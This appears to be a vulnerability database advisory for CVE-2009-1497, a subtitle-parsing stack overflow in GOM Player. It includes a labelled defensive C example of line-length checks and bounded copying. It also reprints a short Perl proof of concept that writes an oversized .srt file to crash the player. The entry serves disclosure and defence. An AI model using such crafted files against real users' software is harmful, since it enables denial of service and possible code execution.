Gomlab Gretech GOM Player .srt File Parsing Stack Overflow Vulnerability

Vulnerability ID 1117554 Vulnerability type Buffer overflow
Published 2009-04-08 Updated 2009-05-01
CVE ID CVE-2009-1497 CNNVD ID CNNVD-200905-018
Platform Windows CVSS score 9.3
|Vulnerability sources
https://www.exploit-db.com/exploits/8370
https://cxsecurity.com/issue/WLB-2009050089
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-018
|Vulnerability details
GOM Player is a media player widely used in South Korea. It supports displaying subtitles while playing multimedia files. Specifically, during subtitle processing GOM Player uses the srt2smi.exe module to convert srt to smi format, but this module does not perform bounds checking correctly. If a user is tricked into loading a specially crafted srt file containing an overlong string, a stack overflow can be triggered, leading to arbitrary code execution.
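As an added illustration, not code from the original advisory or from GOM Player, the following C program shows the bounds check that the details above describe srt2smi.exe as lacking: a scanner that flags any subtitle line longer than a chosen limit before a file is handed to a converter, and a bounded line copy that refuses overlong input instead of overrunning a fixed-size buffer. SRT_MAX_LINE, the function names and the constructed sample cue are assumptions of this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Longest subtitle text line the checker accepts. Assumed value chosen for
 * this example; real subtitle lines are a few dozen bytes. */
#define SRT_MAX_LINE 512

/* Scan an in-memory .srt file and return the 1-based number of the first
 * line longer than max_len bytes, or 0 when every line fits. CR bytes are
 * ignored so CRLF files are measured the same as LF files. */
size_t srt_first_overlong_line(const char *data, size_t len, size_t max_len)
{
    size_t line = 1, cur = 0;
    for (size_t i = 0; i < len; i++) {
        if (data[i] == '\n') { line++; cur = 0; continue; }
        if (data[i] == '\r') continue;
        if (++cur > max_len) return line;
    }
    return 0;
}

/* Bounded copy of one subtitle line into a fixed-size destination. Refuses
 * (returns -1) instead of writing past the end when the line does not fit,
 * which is the check the vulnerable converter is described as missing. */
int srt_copy_line(char *dst, size_t dst_size, const char *src, size_t src_len)
{
    if (dst == NULL || src == NULL || dst_size == 0 || src_len >= dst_size)
        return -1;
    memcpy(dst, src, src_len);
    dst[src_len] = '\0';
    return 0;
}

/* Constructed sample builder: one cue whose text line is text_len 'A's.
 * Returns bytes written, or 0 if buf is too small. */
static size_t build_sample(char *buf, size_t buf_size, size_t text_len)
{
    static const char header[] = "1\n00:00:01,000 --> 00:00:02,000\n";
    size_t n = sizeof header - 1;
    if (n + text_len + 2 > buf_size) return 0;
    memcpy(buf, header, n);
    memset(buf + n, 'A', text_len);
    n += text_len;
    buf[n++] = '\n';
    buf[n++] = '\n';
    return n;
}

/* Ordinary 40-byte subtitle text: expected result 0 (nothing flagged). */
int demo_short_text(void)
{
    char buf[256];
    size_t n = build_sample(buf, sizeof buf, 40);
    return (int)srt_first_overlong_line(buf, n, SRT_MAX_LINE);
}

/* 4096-byte text line: expected result 3 (the third line is overlong). */
int demo_overlong_text(void)
{
    static char buf[8192];
    size_t n = build_sample(buf, sizeof buf, 4096);
    return (int)srt_first_overlong_line(buf, n, SRT_MAX_LINE);
}

/* Try to copy a src_len-byte line into a SRT_MAX_LINE buffer:
 * 0 when it fits, -1 when the bounded copy refuses it. */
int demo_copy(size_t src_len)
{
    static char src[8192];
    char dst[SRT_MAX_LINE];
    if (src_len > sizeof src) return -1;
    memset(src, 'A', src_len);
    return srt_copy_line(dst, sizeof dst, src, src_len);
}

int main(void)
{
    printf("40-byte text, first overlong line: %d\n", demo_short_text());
    printf("4096-byte text, first overlong line: %d\n", demo_overlong_text());
    printf("bounded copy of 40 bytes: %d, of 600 bytes: %d\n",
           demo_copy(40), demo_copy(600));
    return 0;
}
```

The scanner is the kind of pre-check a player or a content gateway can apply before an untrusted subtitle file reaches a native converter; the bounded copy is the fix pattern inside the converter itself, where the caller must handle the refusal rather than silently truncating.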
|Vulnerability EXP
#!/usr/local/bin/perl
use strict;
use warnings;

##################################################################
#
#	Title : GOM Player Subtitle Buffer Overflow Vulnerability
#	Discovery by : Bui Quang Minh
#	Tested : GOM Player 2.1.16.6134
#	Reference : Bkis [http://security.bkis.vn/?p=501]
#	PoC : Windows XP (Silently Crash) and Windows Vista, Windows 7.
#	
##################################################################

# A single 40960-byte line of 'A' with no cue structure; the advisory
# states that srt2smi.exe copies subtitle data without a bounds check.
my $buffer = "A" x 10240 x 4;
my $filename = "gomdos.srt";
open (FILE, ">$filename") || die "\nCan't open $filename: $!";
print FILE $buffer;
close (FILE);
print "\nSuccessfully!\n\nPlease try $filename with a video file!\n";

# milw0rm.com [2009-04-08]
|References

Source: BID
Name: 34427
Link: http://www.securityfocus.com/bid/34427
Source: BUGTRAQ
Name: 20090408 [Bkis-06-2009] GOMPlayer Subtitle Buffer Overflow Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/502552/100/0/threaded
Source: MILW0RM
Name: 8370
Link: http://www.milw0rm.com/exploits/8370
Source: MISC
Link: http://security.bkis.vn/?p=501
Source: SECUNIA
Name: 34639
Link: http://secunia.com/advisories/34639
Source: OSVDB
Name: 53361
Link: http://osvdb.org/53361